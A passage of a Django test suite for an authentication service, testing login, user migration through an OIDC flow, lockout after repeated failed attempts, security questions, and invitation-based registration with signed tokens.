response = self.client.post(reverse("login"), data=data, follow=True)
self.assertEquals(response.context['form'].errors, {
'username': ['Please fill in this field.'],
'password': ['This field is required.'],
})
def test_active_user_login(self):
self.user.is_active = True
self.user.save()
data = {
"login_view-current_step": "auth",
"auth-username": self.user.username,
"auth-password": "Qwer!234"
}
response = self.client.post(
reverse("login"),
data=data,
follow=True
)
# user should be authenticated
self.assertRedirects(response, "{}".format(reverse("edit_profile")))
def test_migrated_user_login(self):
temp_user = TemporaryMigrationUserStore.objects.create(
username="migrateduser",
client_id="migration_client_id",
user_id=1
)
temp_user.set_password("Qwer!234")
data = {
"login_view-current_step": "auth",
"auth-username": temp_user.username,
"auth-password": "Qwer!234"
}
response = self.client.post(
f"{reverse('login')}?next=/openid/authorize/%3Fresponse_type%3Dcode%26scope%3Dopenid%26client_id%3Dmigration_client_id%26redirect_uri%3Dhttp%3A%2F%2Fexample.com%2F%26state%3D3G3Rhw9O5n0okXjZ6mEd2paFgHPxOvoO",
data=data,
follow=True
)
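        # redirect_chain entries are (url, status_code) tuples; the final hop
        # should land on the migration wizard rather than the OIDC authorize view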
self.assertIn(
"/migrate/",
response.redirect_chain[-1][0],
)
self.assertIn(
"/userdata/",
response.redirect_chain[-1][0],
)
self.assertEqual(
response.redirect_chain[-1][1],
302,
)
class TestLogout(LoginHelper, TestCase):
@classmethod
def setUpTestData(cls):
super(TestLogout, cls).setUpTestData()
cls.user = get_user_model().objects.create_superuser(
username="testuser",
email="wrong@email.com",
password="Qwer!234",
birth_date=datetime.date(2001, 12, 12)
)
cls.user.is_active = True
cls.user.save()
cls.client = Client.objects.create(
client_id="migration_client_id",
name="MigrationCLient",
client_secret="super_client_secret_1",
response_type="code",
jwt_alg="HS256",
redirect_uris=["http://example.com/"]
)
def test_logout(self):
with self.assertTemplateUsed("authentication_service/message.html"):
response = self.client.post(
reverse("registration"),
{
"registration_wizard-current_step": "userdata",
"userdata-username": "Username0",
"userdata-password1": "password",
"userdata-password2": "password",
"userdata-gender": "female",
"userdata-age": "16",
"userdata-terms": True,
"userdata-email": "email1@email.com",
},
follow=True
)
response = self.client.get(reverse("oidc_provider:end-session"))
self.assertRedirects(response, reverse('login'))
class TestMigration(LoginHelper, TestCase):
"""
Test urls can be handled a bit better, however this was the fastest way
to refactor the existing tests.
"""
@classmethod
def setUpTestData(cls):
super(TestMigration, cls).setUpTestData()
cls.temp_user = TemporaryMigrationUserStore.objects.create(
username="coolmigrateduser",
client_id="migration_client_id",
user_id=3
)
cls.temp_user.set_password("Qwer!234")
cls.user = get_user_model().objects.create_user(
username="existinguser",
email="existing@email.com",
birth_date=datetime.date(2001, 1, 1),
password="Qwer!234"
)
cls.question_one = SecurityQuestion.objects.create(
question_text="Some text for the one question"
)
cls.question_two = SecurityQuestion.objects.create(
question_text="Some text for the other question"
)
Client.objects.create(
client_id="migration_client_id",
name= "MigrationCLient",
client_secret= "super_client_secret_1",
response_type= "code",
jwt_alg= "HS256",
redirect_uris= ["http://example.com/"]
)
def test_userdata_step(self):
# Login and get the response url
data = {
"login_view-current_step": "auth",
"auth-username": self.temp_user.username,
"auth-password": "Qwer!234"
}
response = self.do_login(data)
# Default required
data = {
"migrate_user_wizard-current_step": "userdata"
}
response = self.client.post(
response.redirect_chain[-1][0],
data=data,
)
self.assertEqual(response.status_code, 200)
self.assertEqual(
response.context["wizard"]["steps"].current, "userdata"
)
self.assertEqual(
response.context["wizard"]["form"].errors,
{"username": ["This field is required."],
"age": ["This field is required."],
"password1": ["This field is required."],
"password2": ["This field is required."]
}
)
# Username unique
data = {
"migrate_user_wizard-current_step": "userdata",
"userdata-username": self.user.username,
"userdata-age": 20,
"userdata-password1": "asdasd",
"userdata-password2": "asdasd"
}
response = self.client.post(
response._request.path,
data=data,
)
self.assertEqual(response.status_code, 200)
self.assertEqual(
response.context["wizard"]["steps"].current, "userdata"
)
self.assertEqual(
response.context["wizard"]["form"].errors,
{"username": ["A user with that username already exists."]}
)
self.assertContains(
response, "A user with that username already exists."
)
def test_securityquestion_step(self):
# Login and get the response url
data = {
"login_view-current_step": "auth",
"auth-username": self.temp_user.username,
"auth-password": "Qwer!234"
}
response = self.do_login(data)
# Username unique
data = {
"migrate_user_wizard-current_step": "userdata",
"userdata-username": "newusername",
"userdata-age": 20,
"userdata-password1": "asdasd",
"userdata-password2": "asdasd"
}
response = self.client.post(
response.redirect_chain[-1][0],
data=data,
)
response = self.client.get(response.url)
data = {
"migrate_user_wizard-current_step": "securityquestions",
"securityquestions-TOTAL_FORMS": 2,
"securityquestions-INITIAL_FORMS": 0,
"securityquestions-MIN_NUM_FORMS": 0,
"securityquestions-MAX_NUM_FORMS": 1000,
}
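        # TOTAL_FORMS / INITIAL_FORMS / MIN_NUM_FORMS / MAX_NUM_FORMS are the
        # Django formset management-form fields; posting them without any
        # per-form data should trigger the non-form error asserted below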
response = self.client.post(
response._request.path,
data=data,
)
self.assertEqual(
response.context["wizard"]["form"].non_form_errors(),
["Please fill in all Security Question fields."]
)
self.assertContains(
response, "Please fill in all Security Question fields."
)
data = {
"migrate_user_wizard-current_step": "securityquestions",
"securityquestions-TOTAL_FORMS": 2,
"securityquestions-INITIAL_FORMS": 0,
"securityquestions-MIN_NUM_FORMS": 0,
"securityquestions-MAX_NUM_FORMS": 1000,
"securityquestions-0-question": self.question_one.id,
"securityquestions-0-answer": "Answer1",
"securityquestions-1-question": self.question_one.id,
"securityquestions-1-answer": "Answer2"
}
response = self.client.post(
response._request.path,
data=data,
)
self.assertEqual(
response.context["wizard"]["form"].non_form_errors(),
["Oops! You’ve already chosen this question. Please choose a different one."]
)
self.assertContains(
response, "Oops! You’ve already chosen this question. Please choose a different one."
)
@override_settings(ACCESS_CONTROL_API=MagicMock())
def test_migration_step(self):
# Login and get the response url
data = {
"login_view-current_step": "auth",
"auth-username": self.temp_user.username,
"auth-password": "Qwer!234"
}
response = self.do_login(data)
# Username unique
data = {
"migrate_user_wizard-current_step": "userdata",
"userdata-username": "newusername",
"userdata-age": 20,
"userdata-password1": "asdasd",
"userdata-password2": "asdasd"
}
response = self.client.post(
response.redirect_chain[-1][0],
data=data,
follow=True
)
data = {
"migrate_user_wizard-current_step": "securityquestions",
"securityquestions-TOTAL_FORMS": 2,
"securityquestions-INITIAL_FORMS": 0,
"securityquestions-MIN_NUM_FORMS": 0,
"securityquestions-MAX_NUM_FORMS": 1000,
"securityquestions-0-question": self.question_one.id,
"securityquestions-0-answer": "Answer1",
"securityquestions-1-question": self.question_two.id,
"securityquestions-1-answer": "Answer2"
}
self.assertEqual(get_user_model().objects.filter(
username=self.temp_user.username).count(), 0
)
response = self.client.post(
response._request.path,
data=data,
follow=True
)
self.assertRedirects(
response,
"/openid/authorize/?response_type=code&scope=openid&client_id=migration_client_id&redirect_uri=http://example.com/&state=3G3Rhw9O5n0okXjZ6mEd2paFgHPxOvoO"
)
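        # completing the wizard resumes the original OIDC authorize request
        # that was carried along in the "next" parameter at login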
self.assertEqual(get_user_model().objects.filter(
username="newusername").count(), 1
)
self.assertEqual(
get_user_model().objects.get(
username="newusername").usersecurityquestion_set.all().count(),
2
)
self.assertEqual(
TemporaryMigrationUserStore.objects.filter(
username="coolmigrateduser").count(),
0
)
session_user = auth.get_user(self.client)
self.assertEqual(
session_user,
get_user_model().objects.get(username="newusername")
)
self.assertEqual(
get_user_model().objects.get(username="newusername").migration_data,
{
"client_id": "migration_client_id",
"user_id": 3,
"username": "coolmigrateduser"
}
)
@override_settings(ACCESS_CONTROL_API=MagicMock())
def test_migration_redirect_persist(self):
temp_user = TemporaryMigrationUserStore.objects.create(
username="newmigratedsupercooluser",
client_id="migration_client_id",
user_id=2
)
temp_user.set_password("Qwer!234")
data = {
"login_view-current_step": "auth",
"auth-username": temp_user.username,
"auth-password": "Qwer!234"
}
response = self.client.post(
f"{reverse('login')}?next=/openid/authorize/%3Fresponse_type%3Dcode%26scope%3Dopenid%26client_id%3Dmigration_client_id%26redirect_uri%3Dhttp%3A%2F%2Fexample.com%2F%26state%3D3G3Rhw9O5n0okXjZ6mEd2paFgHPxOvoO",
data=data,
follow=True
)
data = {
"migrate_user_wizard-current_step": "userdata",
"userdata-username": "newusername",
"userdata-age": 20,
"userdata-password1": "asdasd",
"userdata-password2": "asdasd"
}
response = self.client.post(
response.redirect_chain[-1][0],
data=data,
follow=True
)
data = {
"migrate_user_wizard-current_step": "securityquestions",
"securityquestions-TOTAL_FORMS": 2,
"securityquestions-INITIAL_FORMS": 0,
"securityquestions-MIN_NUM_FORMS": 0,
"securityquestions-MAX_NUM_FORMS": 1000,
"securityquestions-0-question": self.question_one.id,
"securityquestions-0-answer": "Answer1",
"securityquestions-1-question": self.question_two.id,
"securityquestions-1-answer": "Answer2"
}
self.assertEqual(get_user_model().objects.filter(
username=self.temp_user.username).count(), 0
)
response = self.client.post(
response._request.path,
data=data,
follow=True
)
self.assertRedirects(
response,
f"/openid/authorize/?response_type=code&scope=openid&client_id=migration_client_id&redirect_uri=http://example.com/&state=3G3Rhw9O5n0okXjZ6mEd2paFgHPxOvoO"
)
@override_settings(ACCESS_CONTROL_API=MagicMock())
@patch("django.core.signing.loads")
def test_expired_token(self, expire_mock):
expire_mock.side_effect = signing.SignatureExpired("Expired")
data = {
"login_view-current_step": "auth",
"auth-username": self.temp_user.username,
"auth-password": "Qwer!234"
}
response = self.do_login(data)
self.assertRedirects(
response,
"/en/login/?next=/openid/authorize/" \
"%3Fresponse_type%3Dcode%26scope%3Dopenid" \
"%26client_id%3Dmigration_client_id%26" \
"redirect_uri%3Dhttp%253A%252F%252Fexample.com%252F%26" \
"state%3D3G3Rhw9O5n0okXjZ6mEd2paFgHPxOvoO"
)
class TestLockout(TestCase):
@classmethod
def setUpClass(cls):
super(TestLockout, cls).setUpClass()
cls.user = get_user_model().objects.create_user(
username="user_{}".format(random.randint(0, 10000)),
password="password",
birth_date=datetime.date(2001, 1, 1)
)
cls.user.save()
def setUp(self):
super(TestLockout, self).setUp()
def test_lockout(self):
login_url = reverse("login")
login_data = {
"login_view-current_step": "auth",
"auth-username": self.user.username,
"auth-password": "wrongpassword"
}
allowed_attempts = settings.DEFENDER_LOGIN_FAILURE_LIMIT
attempt = 0
while attempt < allowed_attempts:
attempt += 1
self.client.get(login_url)
response = self.client.post(login_url, login_data)
self.assertEqual(response.status_code, 200)
self.assertIn("authentication_service/login.html",
response.template_name)
# The next (failed) attempt needs to prevent further login attempts
self.client.get(login_url)
response = self.client.post(login_url, login_data, follow=True)
self.assertEqual([template.name for template in response.templates],
["authentication_service/lockout.html",
"base.html"])
# Even using the proper password, the user will still be blocked.
login_data["auth-password"] = "password"
self.client.get(login_url)
response = self.client.post(login_url, login_data, follow=True)
self.assertEqual([template.name for template in response.templates],
["authentication_service/lockout.html",
"base.html"])
# Manually unblock the username. This allows the user to try again.
unblock_username(self.user.username)
self.client.get(login_url)
response = self.client.post(login_url, login_data)
self.assertEqual(response.status_code, 302)
class TestSecurityQuestionLockout(TestCase):
@classmethod
def setUpTestData(cls):
super(TestSecurityQuestionLockout, cls).setUpTestData()
cls.user = get_user_model().objects.create_user(
username="user_who_forgot_creds",
password="Qwer!234",
birth_date=datetime.date(2001, 1, 1)
)
cls.user.save()
cls.question_one = SecurityQuestion.objects.create(
question_text="Some text for the one question"
)
cls.question_two = SecurityQuestion.objects.create(
question_text="Some text for the other question"
)
cls.user_answer_one = UserSecurityQuestion.objects.create(
question=cls.question_one,
user=cls.user,
answer="right"
)
cls.user_answer_two = UserSecurityQuestion.objects.create(
question=cls.question_two,
user=cls.user,
answer="right"
)
def test_lockout_on_reset(self):
# Ensure user is not blocked
unblock_username(self.user.username)
session = self.client.session
session["lookup_user_id"] = str(self.user.id)
session.save()
reset_url = reverse("reset_password_security_questions")
reset_data = {
"login_view-current_step": "auth",
"auth-username": self.user.username,
"question_%s" % self.user_answer_one.id: "test",
"question_%s" % self.user_answer_two.id: "answer"
}
allowed_attempts = settings.DEFENDER_LOGIN_FAILURE_LIMIT
attempt = 0
while attempt < allowed_attempts:
attempt += 1
self.client.get(reset_url)
response = self.client.post(reset_url, reset_data)
self.assertEqual(response.status_code, 200)
self.assertIn(
"authentication_service/reset_password/security_questions.html",
response.template_name
)
self.client.get(reset_url)
response = self.client.post(reset_url, reset_data, follow=True)
self.assertEqual([template.name for template in response.templates],
["authentication_service/lockout.html",
"base.html"])
# Even attempting via the password reset page won't work
response = self.client.get(reverse("reset_password"))
self.assertEqual(response.status_code, 200)
response = self.client.post(
reverse("reset_password"), {"email": self.user.username}, follow=True)
self.assertEqual([template.name for template in response.templates],
["authentication_service/lockout.html",
"base.html"])
unblock_username(self.user.username)
self.client.get(reset_url)
response = self.client.post(reset_url, reset_data)
self.assertEqual(response.status_code, 200)
self.assertIn(
"authentication_service/reset_password/security_questions.html",
response.template_name
)
class TestRegistrationView(TestCase):
@classmethod
def setUpTestData(cls):
super(TestRegistrationView, cls).setUpTestData()
# Security questions
cls.question_one = SecurityQuestion.objects.create(
question_text="Some text for the one question"
)
cls.question_two = SecurityQuestion.objects.create(
question_text="Some text for the other question"
)
cls.question_three = SecurityQuestion.objects.create(
question_text="Some text Three"
)
cls.question_four = SecurityQuestion.objects.create(
question_text="Some text Four"
)
cls.question_five = SecurityQuestion.objects.create(
question_text="Some text Five"
)
cls.client_obj = Client.objects.create(
client_id="redirect-tester",
name= "RedirectClient",
client_secret= "super_client_secret_4",
response_type= "code",
jwt_alg= "HS256",
redirect_uris= ["/test-redirect-url/"],
)
cls.admin_user = get_user_model().objects.create_user(
username="user_{}".format(random.randint(0, 10000)),
password="password",
birth_date=datetime.date(2001, 1, 1)
)
cls.organisation = Organisation.objects.create(
name="inviteorg",
description="invite_text"
)
test_invitation_id = uuid.uuid4()
cls.invitation = Invitation(
id=test_invitation_id.hex,
invitor_id=str(cls.admin_user.id),
first_name="super_cool_invitation_fname",
last_name="same_as_above_but_surname",
email="totallynotinvitation@email.com",
organisation_id=cls.organisation.id,
expires_at=timezone.now() + datetime.timedelta(minutes=10),
created_at=timezone.now(),
updated_at=timezone.now()
)
def test_logged_in_user(self):
url = reverse('registration')
res = self.client.get(url)
self.assertEqual(res.status_code, 302)
self.assertIn(url, res.url)
        # force login a user; they should no longer see the registration page
self.client.force_login(self.admin_user)
res = self.client.get(url)
self.assertRedirects(res, reverse('edit_profile'))
def test_invite_tampered_signature(self):
invite_id = "8d81e01c-8a75-11e8-845e-0242ac120009"
params = {
"security": "high",
"invitation_id": invite_id
}
tampered_signature = signing.dumps(params, salt="invitation") + "m"
with self.assertTemplateUsed("authentication_service/message.html"):
response = self.client.get(
reverse("registration"
) + f"?invitation={tampered_signature}",
follow=True
)
params = {
"security": "high",
}
incorrect_signature = signing.dumps(params, salt="invitation")
with self.assertTemplateUsed("authentication_service/message.html"):
response = self.client.get(
reverse("registration"
) + f"?invitation={incorrect_signature}",
follow=True
)
@override_settings(ACCESS_CONTROL_API=MagicMock())
@patch("authentication_service.api_helpers.get_invitation_data")
def test_invite_missing(self, mocked_get_invitation_data):
mocked_get_invitation_data.return_value = {"error": True}
invite_id = "8d81e01c-8a75-11e8-845e-0242ac120009"
params = {
"security": "high",
"invitation_id": invite_id
}
signature = signing.dumps(params, salt="invitation")
with self.assertTemplateUsed("authentication_service/message.html"):
response = self.client.get(
reverse("registration"
) + f"?invitation={signature}",
follow=True
)
@override_settings(ACCESS_CONTROL_API=MagicMock())
def test_expire(self):
test_invitation_id = uuid.uuid4()
invitation = Invitation(
id=test_invitation_id.hex,
invitor_id=str(self.admin_user.id),
first_name="super_cool_invitation_fname",
last_name="same_as_above_but_surname",
email="totallynotinvitation@email.com",
organisation_id=10,
expires_at=timezone.now() - datetime.timedelta(minutes=10),
created_at=timezone.now(),
updated_at=timezone.now()
)
with mock.patch("authentication_service.api_helpers.settings") as mocked_settings:
mocked_settings.ACCESS_CONTROL_API.invitation_read.return_value = invitation
invite_id = "8d81e01c-8a75-11e8-845e-0242ac120009"
params = {
"security": "high",
"invitation_id": invite_id
}
signature = signing.dumps(params, salt="invitation")
with self.assertTemplateUsed("authentication_service/message.html"):
response = self.client.get(
reverse("registration"
) + f"?invitation={signature}",
follow=True
)
self.assertContains(response, "The invitation has expired.")
@override_settings(ACCESS_CONTROL_API=MagicMock())
def test_form_initial(self):
with mock.patch("authentication_service.api_helpers.settings") as mocked_settings:
mocked_settings.ACCESS_CONTROL_API.invitation_read.return_value = self.invitation
invite_id = "8d81e01c-8a75-11e8-845e-0242ac120009"
params = {
"security": "high",
"invitation_id": invite_id
}
signature = signing.dumps(params, salt="invitation")
response = self.client.get(
reverse("registration"
) + f"?invitation={signature}",
follow=True
)
self.assertIn(
"/registration/userdata/",
response.redirect_chain[-1][0],
)
self.assertEqual(
response.context["form"].initial,
{
"first_name": "super_cool_invitation_fname",
"last_name": "same_as_above_but_surname",
"email": "totallynotinvitation@email.com"
}
)
@override_settings(ACCESS_CONTROL_API=MagicMock())
@patch("authentication_service.api_helpers.invitation_redeem")
def test_form_redeem_failure(self, mocked_redeem):
with mock.patch("authentication_service.api_helpers.settings") as mocked_settings:
mocked_settings.ACCESS_CONTROL_API.invitation_read.return_value = self.invitation
mocked_redeem.return_value = {
"error": True
}
invite_id = "8d81e01c-8a75-11e8-845e-0242ac120009"
params = {
"security": "high",
"invitation_id": invite_id
}
signature = signing.dumps(params, salt="invitation")
response = self.client.get(
reverse("registration"
) + f"?invitation={signature}",
follow=True
)
self.assertIn(
"/registration/userdata/",
response.redirect_chain[-1][0],
)
with self.assertTemplateUsed("authentication_service/message.html"):
response = self.client.post(
reverse("registration"),
{
"registration_wizard-current_step": "userdata",
"userdata-username": "Username",
"userdata-password1": "@32786AGYJUFEtyfusegh,.,",
"userdata-password2": "@32786AGYJUFEtyfusegh,.,",
"userdata-gender": "female",
"userdata-age": "18",
"userdata-birth_date": "2000-01-01",
"userdata-terms": True,
"userdata-email": "email@email.com",
},
follow=True
)
self.assertContains(response, "Oops. You have")
@override_settings(ACCESS_CONTROL_API=MagicMock())
@patch("authentication_service.api_helpers.invitation_redeem")
def test_org_missing_failure(self, mocked_redeem):
test_invitation_id = uuid.uuid4()
invitation = Invitation(
id=test_invitation_id.hex,
invitor_id=str(self.admin_user.id),
first_name="super_cool_invitation_fname",
last_name="same_as_above_but_surname",
email="totallynotinvitation@email.com",
organisation_id=845459,
expires_at=timezone.now() + datetime.timedelta(minutes=10),
created_at=timezone.now(),
updated_at=timezone.now()
)
with mock.patch("authentication_service.api_helpers.settings") as mocked_settings:
mocked_settings.ACCESS_CONTROL_API.invitation_read.return_value = invitation
mocked_redeem.return_value = {
"error": True
}
invite_id = "8d81e01c-8a75-11e8-845e-0242ac120009"
params = {
"security": "high",
"invitation_id": invite_id
}
signature = signing.dumps(params, salt="invitation")
response = self.client.get(
reverse("registration"
) + f"?invitation={signature}",
)
self.assertEqual(response.status_code, 404)
@override_settings(ACCESS_CONTROL_API=MagicMock())
@patch("authentication_service.api_helpers.invitation_redeem")
def test_form_redeem_success(self, mocked_redeem):
# NOTE self.invitation.id != invite_id, due to invitation values being
# mocked as well.
with mock.patch("authentication_service.api_helpers.settings") as mocked_settings:
mocked_settings.ACCESS_CONTROL_API.invitation_read.return_value = self.invitation
mocked_redeem.return_value = {
"error": False
}
invite_id = "8d81e01c-8a75-11e8-845e-0242ac120009"
params = {
"security": "high",
"invitation_id": invite_id
}
signature = signing.dumps(params, salt="invitation")
response = self.client.get(
reverse("registration"
) + f"?invitation={signature}",
follow=True
)
self.assertIn(
"/registration/userdata/",
response.redirect_chain[-1][0],
)
with self.assertTemplateUsed("authentication_service/message.html"):
response = self.client.post(
reverse("registration"),
{
"registration_wizard-current_step": "userdata",
"userdata-username": "AmazingInviteUser",
"userdata-password1": "@A2315,./,asDV",
"userdata-password2": "@A2315,./,asDV",
"userdata-gender": "female",
"userdata-age": "18",
"userdata-birth_date": "2000-01-01",
"userdata-terms": True,
"userdata-email": "email@email.com",
},
follow=True
)
user = get_user_model().objects.get(username="AmazingInviteUser")
mocked_settings.ACCESS_CONTROL_API.invitation_read.assert_called_with(invite_id)
mocked_redeem.assert_called_with(self.invitation.id, user.id)
self.assertContains(response, "Congratulations, you have successfully")
self.assertEqual(user.organisation, self.organisation)
@override_settings(ACCESS_CONTROL_API=MagicMock())
@patch("authentication_service.api_helpers.invitation_redeem")
def test_form_redeem_success_with_invitation_redirect(self, mocked_redeem):
# NOTE self.invitation.id != invite_id, due to invitation values being
# mocked as well.
with mock.patch("authentication_service.api_helpers.settings") as mocked_settings:
mocked_settings.ACCESS_CONTROL_API.invitation_read.return_value = self.invitation
mocked_redeem.return_value = {
"error": False
}
invite_id = "8d81e01c-8a75-11e8-845e-0242ac120009"
redirect_url = "http://example.com/redirect?foo=bar"
params = {
"security": "high",
"invitation_id": invite_id,
"redirect_url": redirect_url
}
signature = signing.dumps(params, salt="invitation")
response = self.client.get(
reverse("registration"
) + f"?invitation={signature}",
follow=True
)
self.assertIn(
"/registration/userdata/",
response.redirect_chain[-1][0],
)
with self.assertTemplateUsed("authentication_service/message.html"):
response = self.client.post(
reverse("registration"),
{
"registration_wizard-current_step": "userdata",
"userdata-username": "AmazingInviteUser",
"userdata-password1": "@A2315,./,asDV",
"userdata-password2": "@A2315,./,asDV",
"userdata-gender": "female",
"userdata-age": "18",
"userdata-birth_date": "2000-01-01",
"userdata-terms": True,
"userdata-email": "email@email.com",
},
follow=True
)
user = get_user_model().objects.get(username="AmazingInviteUser")
mocked_settings.ACCESS_CONTROL_API.invitation_read.assert_called_with(invite_id)
mocked_redeem.assert_called_with(self.invitation.id, user.id)
self.assertContains(response, "Congratulations, you have successfully")
self.assertContains(response, redirect_url)
self.assertEqual(user.organisation, self.organisation)
def test_view_success_template(self):
# Test most basic iteration
with self.assertTemplateUsed("authentication_service/message.html"):
response = self.client.post(
reverse("registration"),
{
"registration_wizard-current_step": "userdata",
"userdata-username": "Username",
"userdata-password1": "@A2315,./,asDV",
"userdata-password2": "@A2315,./,asDV",
"userdata-gender": "female",
"userdata-age": "18",
"userdata-birth_date": "2000-01-01",
"userdata-terms": True,
"userdata-email": "email@email.com",
},
follow=True
)
def test_view_success_template_age(self):
# Test most basic registration with age instead of birth_date
with self.assertTemplateUsed("authentication_service/message.html"):
response = self.client.post(
reverse("registration"),
{
"registration_wizard-current_step": "userdata",
"userdata-username": "Username0",
"userdata-password1": "password",
"userdata-password2": "password",
"userdata-gender": "female",
"userdata-age": "16",
"userdata-terms": True,
"userdata-email": "email1@email.com",
},
follow=True
)
def test_view_success_template_age_and_bday(self):
# Test most basic registration with age and birth_date. Birth_date takes precedence.
with self.assertTemplateUsed("authentication_service/message.html"):
response = self.client.post(
reverse("registration"),
{
"registration_wizard-current_step": "userdata",
"userdata-username": "Username0a",
"userdata-password1": "password",
"userdata-password2": "password",
"userdata-birth_date": "1999-01-01",
"userdata-gender": "female",
"userdata-age": "16",
"userdata-terms": True,
"userdata-email": "email2@email.com",
},
follow=True
)
@patch("authentication_service.signals.api_helpers.get_site_for_client")
def test_view_success_redirects_no_2fa(self, api_mock):
api_mock.return_value = 2
response = self.client.get(
reverse(
"registration"
) + "?client_id=redirect-tester&redirect_uri=/test-redirect-url/",
follow=True
)
self.assertEquals(
self.client.session[
constants.EXTRA_SESSION_KEY][
constants.SessionKeys.CLIENT_NAME],
self.client_obj.name
)
self.assertEquals(
self.client.session[
constants.EXTRA_SESSION_KEY][
constants.SessionKeys.CLIENT_URI],
"/test-redirect-url/"
)
self.assertEquals(
response.context["ge_global_redirect_uri"], "/test-redirect-url/"
)
self.assertEquals(
response.context["ge_global_client_name"], self.client_obj.name
)
# Test redirect url, no 2fa
response = self.client.post(
reverse("registration"),
{
"registration_wizard-current_step": "userdata",
"userdata-username": "Username1",
"userdata-password1": "password",
"userdata-password2": "password",
"userdata-birth_date": "1999-01-01",
"userdata-gender": "female",
"userdata-age": "18",
"userdata-terms": True,
"userdata-email": "email2@email.com",
},
follow=True
)
self.assertEquals(response.redirect_chain[-1][0], "/test-redirect-url/")
@patch("authentication_service.signals.api_helpers.get_site_for_client")
def test_view_success_redirects_2fa(self, api_mock):
api_mock.return_value = 2
response = self.client.get(
reverse(
"registration"
) + "?client_id=redirect-tester&redirect_uri=/test-redirect-url/",
follow=True
)
self.assertEquals(
self.client.session[
constants.EXTRA_SESSION_KEY][
constants.SessionKeys.CLIENT_NAME],
self.client_obj.name
)
self.assertEquals(
self.client.session[
constants.EXTRA_SESSION_KEY][
constants.SessionKeys.CLIENT_URI],
"/test-redirect-url/"
)
self.assertEquals(
response.context["ge_global_redirect_uri"], "/test-redirect-url/"
)
self.assertEquals(
response.context["ge_global_client_name"], self.client_obj.name
)
## GE-1117: Changed
# Test redirect url, 2fa
response = self.client.post(
reverse("registration") + "?show2fa=true",
{
"registration_wizard-current_step": "userdata",
"userdata-username": "Username2",
"userdata-gender": "female",
"userdata-age": "18",
"userdata-password1": "awesom#saFe3",
"userdata-password2": "awesom#saFe3",
"userdata-birth_date": "2000-01-01",
"userdata-terms": True,
"userdata-email": "email3@email.com",
"userdata-msisdn": "0856545698",
},
follow=True
)
## GE-1117: Changed
# self.assertin(response.url, reverse("two_factor_auth:setup"))
self.assertEquals(response.redirect_chain[-1][0], "/test-redirect-url/")
@patch("authentication_service.signals.api_helpers.get_site_for_client")
def test_view_success_redirects_security_high(self, api_mock):
api_mock.return_value = 2
response = self.client.get(
reverse(
"registration"
) + "?client_id=redirect-tester&redirect_uri=/test-redirect-url/",
follow=True
)
self.assertEquals(
self.client.session[
constants.EXTRA_SESSION_KEY][
constants.SessionKeys.CLIENT_NAME],
self.client_obj.name
)
self.assertEquals(
self.client.session[
constants.EXTRA_SESSION_KEY][
constants.SessionKeys.CLIENT_URI],
"/test-redirect-url/"
)
self.assertEquals(
response.context["ge_global_redirect_uri"], "/test-redirect-url/"
)
self.assertEquals(
response.context["ge_global_client_name"], self.client_obj.name
)
response = self.client.get(
reverse(
"registration"
) + "?client_id=redirect-tester&redirect_uri=/test-redirect-url/"
)
# Test redirect url, high security
response = self.client.post(
reverse("registration") + "?security=high",
{
"registration_wizard-current_step": "userdata",
"userdata-username": "Username3",
"userdata-gender": "female",
"userdata-age": "18",
"userdata-password1": "awesom#saFe3",
"userdata-password2": "awesom#saFe3",
"userdata-birth_date": "2000-01-01",
"userdata-terms": True,
"userdata-email": "email3@email.com",
"userdata-msisdn": "0856545698",
},
follow=True
)
## GE-1117: Changed
# self.assertin(response.url, reverse("two_factor_auth:setup"))
self.assertEquals(response.redirect_chain[-1][0], "/test-redirect-url/")
@patch("authentication_service.signals.api_helpers.get_site_for_client")
def test_success_redirect(self, api_mock):
api_mock.return_value = 2
# Test without redirect URI set.
response = self.client.get(reverse("redirect_view"))
self.assertIn(response.url, reverse("login"))
# Test with redirect URI set.
Client.objects.create(
client_id="redirect-tester-3",
name="RedirectClient",
client_secret="super_client_secret_4",
response_type="code",
jwt_alg="HS256",
redirect_uris=["/test-redirect-url-something/"],
)
response = self.client.get(
reverse("registration") + "?client_id=redirect-tester-3&redirect_uri=/test-redirect-url-something/",
follow=True
)
response = self.client.post(
response.redirect_chain[-1][0],
{
"registration_wizard-current_step": "userdata",
"userdata-username": "RedirectUser",
"userdata-gender": "female",
"userdata-age": "18",
"userdata-password1": "awesom#saFe3",
"userdata-password2": "awesom#saFe3",
"userdata-birth_date": "2000-01-01",
"userdata-terms": True,
"userdata-email": "email3@email.com",
"userdata-msisdn": "0856545698",
},
follow=True
)
self.assertEquals(response.redirect_chain[-1][0], "/test-redirect-url-something/")
def test_user_save(self):
## GE-1117: Changed
with self.assertTemplateUsed("authentication_service/message.html"):
response = self.client.post(
reverse("registration") + "?security=high",
{
"registration_wizard-current_step": "userdata",
"userdata-username": "Unique@User@Name",
"userdata-password1": "awesom#saFe3",
"userdata-password2": "awesom#saFe3",
"userdata-birth_date": "2000-01-01",
"userdata-terms": True,
"userdata-email": "emailunique@email.com",
"userdata-msisdn": "0856545698",
"userdata-gender": "female",
"userdata-age": "16",
},
follow=True
)
self.assertRedirects(
response,
reverse("registration_step", kwargs={"step": "done"})
)
# self.assertIn(response.url, reverse("two_factor_auth:setup"))
user = get_user_model().objects.get(username="Unique@User@Name")
self.assertEquals(user.email, "emailunique@email.com")
self.assertEquals(user.msisdn, "0856545698")
def test_security_questions_save(self):
## GE-1117: Changed
response = self.client.post(
reverse("registration"),
{
"registration_wizard-current_step": "userdata",
"userdata-username": "Unique@User@Name",
"userdata-gender": "female",
"userdata-age": "16",
"userdata-password1": "awesom#saFe3",
"userdata-password2": "awesom#saFe3",
"userdata-birth_date": "2000-01-01",
"userdata-terms": True,
"userdata-msisdn": "0856545698",
},
follow=True
)
with self.assertTemplateUsed("authentication_service/message.html"):
response = self.client.post(
response.redirect_chain[-1][0],
{
"registration_wizard-current_step": "securityquestions",
"securityquestions-TOTAL_FORMS": "2",
"securityquestions-INITIAL_FORMS": "0",
"securityquestions-MIN_NUM_FORMS": "0",
"securityquestions-MAX_NUM_FORMS": "1000",
"securityquestions-0-question": self.question_one.id,
"securityquestions-0-answer": "Answer1",
"securityquestions-1-question": self.question_two.id,
"securityquestions-1-answer": "Answer2"
},
follow=True
)
# self.assertIn(response.url, reverse("two_factor_auth:setup"))
user = get_user_model().objects.get(username="Unique@User@Name")
self.assertEquals(user.msisdn, "0856545698")
question_one = UserSecurityQuestion.objects.get(
question=self.question_one,
language_code="en"
)
self.assertEquals(question_one.user, user)
question_two = UserSecurityQuestion.objects.get(
question=self.question_two,
language_code="en"
)
self.assertEquals(question_two.user, user)
def test_redirect_view(self):
# Test without redirect URI set.
response = self.client.get(reverse("redirect_view"))
self.assertIn(response.url, reverse("login"))
